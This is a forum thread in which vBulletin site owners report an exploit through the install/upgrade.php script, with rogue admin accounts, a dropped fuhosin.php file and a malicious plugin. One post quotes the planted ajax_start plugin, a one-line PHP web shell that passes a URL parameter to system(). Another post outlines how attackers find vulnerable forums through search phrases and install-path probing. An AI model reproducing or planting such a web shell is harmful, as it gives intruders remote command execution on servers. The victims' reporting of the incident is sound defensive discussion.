-
my ajax_start plugin seems to be failing. the code in it looks suspect, but it could be normal.
there is a file called fuhosin.php in my /forum/ directory that is signed by a hacker. I deleted it. Not sure if a different version of that should be there or notLeave a comment:
-
-
-
Looks like I got hit with a similar exploit - they did not deface my site like the OP's - not yet anyway. They did find a way to add about 10 new users, all with the same username, (Th3H4ck) and all with admin privs.
I would not have known about this vulnerability, or the active exploit, if they had not .. maybe I should not post what triggered my knowledge of this.
I would of like to have received an email about this exploit. Now going to 302 redirect to my buddypress install. Hope my host has backup database and files from 5 days ago. Fingers crossed.
vbulletin 4.2.1 running, and had new member moderation turned on -
what I wonder is how they were able to run sql insert commands from /forums/core/install/upgrade.php --- when I do not even have a /core/ or /core/install/ folder on this server.
Will we get an email if the exploit fix is found?Leave a comment:
-
What about VB not sending an advice email to licensed members ?? I was here for another problem and now I am reading this thread, really surprised !!Leave a comment:
-
Yes, hole is in the install folder (at least for this exploit)
They search for vbulletin powered websites using phrases like (powered by vbulletin 4.2.0 / 4.2.1 / 5) and then they check manually if install folder exists by typing domain.com/forumpath/install/upgrade.php
If it exists they complete the job using exploit they found. (I wonder if vbulletin team has found what is it yet??? ) If it doesn't exist, they turn back to "Google" and search for other potential victims.
But what we know is they can use this exploit for only 4.2.0+ and 5 versions of vbulletin.Last edited by Reignman; Mon 2 Sep '13, 5:01am.Leave a comment:
-
How does something like this get around so quickly?
Not a robot, or a macro, this is an individual or group of individuals exploiting a vulnerability...
I haven't been affected yet, maybe because I was active in the admin cp at the time of the notification and deleted the install folder?
But is the install folder the hole? Has this been clarified?
How do they find a vulnerable site to begin with? Surely there is no google search term 'vulnerable vB sites'.
What do they search for in order to complete the job?Leave a comment:
-
Do you have any "strange" plugin on your vbulletin products? It's one of the smyptoms of this exploit.
Probably it's another one. Better contact to vbulletion support.
Bad thing is I see slight changes on codes, hacking messages. So I think it's now spreaded around.Leave a comment:
-
-
I just noticed I had a new user registered on my forum calling himself "administrator." Found it fishy, and saw they put themselves in the administrator area... with no IP address tied to anything and a clearly fake e-mail address. Banned the account.
I've deleted my install directory since then though, but what I'm wondering is... is this tied to that install directory exploit? Or has anyone else witnessed something like this?Leave a comment:
-
Which version do you use? If you use vBulletin 5, install directory is inside core directory. >>> /core/install
He needs install/upgrade.php in order to complete hijacking, so if you don't have "install" directory and still you have the above problem, that means it's another vulnerability.Leave a comment:
-
I have the same problem. The hacker has registered as an Admin, then created this a plugin with the hook location ajax_start:
Please advise. I don't have the install directory at all prior to this hack.Code:if(isset($_GET['lol'])){echo "<h1>pwn</h1><pre>"; system($_GET ['lol']);exit;}Leave a comment:
Leave a comment: